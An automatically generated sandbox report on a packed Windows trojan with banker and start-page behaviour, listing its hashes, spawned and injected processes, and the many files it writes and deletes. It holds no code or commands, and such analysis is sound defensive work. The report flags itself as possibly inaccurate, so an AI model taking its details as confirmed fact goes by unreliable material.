Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4ef0a3733fc5a67cf2f092543e147b35
SHA1: faaf987b561e20472df41e1212eefa0d7b4ee66e
SHA256: 6c1fccf0dabb305645fbd5c94fbb20edeb24fe9ba33a74ed0616db0213e91019
SSDeep: 196608:/5nXAPYOn5M6jOlYBjuc8xJDKtBP0vucdOsI YVQMqmQUxPPcULmswJ3W7ixKk9S:xnAYSMw 0unXnvv0TsuPPTwJG7/koNWO
Size: 13738518 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-04-10 15:19:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
9158chat2_ktv088_63.exe:2116
sr.exe:244
9158IE.exe:3116
xianfengkunbang.exe:1324
BaiduP2PService.exe:252
BaiduP2PService.exe:472
RsMgrSvc.exe:1936
regsvr32.exe:2380
regsvr32.exe:2448
regsvr32.exe:2328
regsvr32.exe:2480
9158.exe:3012
popwndexe.exe:760
xianfengupdate.exe:660
%original file name%.exe:1736
The Trojan injects its code into the following process(es):
MM-liao8863.exe:2808
xianfeng.exe:272
QQPCDownload71960.exe:2776
install1393485.exe:1148
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process 9158chat2_ktv088_63.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\öÃâ€ÃƒËœ 9158多人视频.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158多人视频\9158多人视频.lnk (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Desktop\9158多人视频.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (0 bytes)
The process sr.exe:244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)
The process xianfengkunbang.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
%Program Files%\tools\BaiduP2PService.exe (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
%Program Files%\tools\P2PStatReport.dll (12536 bytes)
%Program Files%\tools\P2SBase.dll (18424 bytes)
%Program Files%\tools\P2PBase.dll (17848 bytes)
%Program Files%\tools\sr.exe (5520 bytes)
The Trojan deletes the following file(s):
%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (0 bytes)
The process MM-liao8863.exe:2808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
C:\temp.icon (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)
The process BaiduP2PService.exe:472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.ini (0 bytes)
The process xianfeng.exe:272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)
The process RsMgrSvc.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
The process QQPCDownload71960.exe:2776 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (0 bytes)
The process install1393485.exe:1148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll (1411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll (12014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (2035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
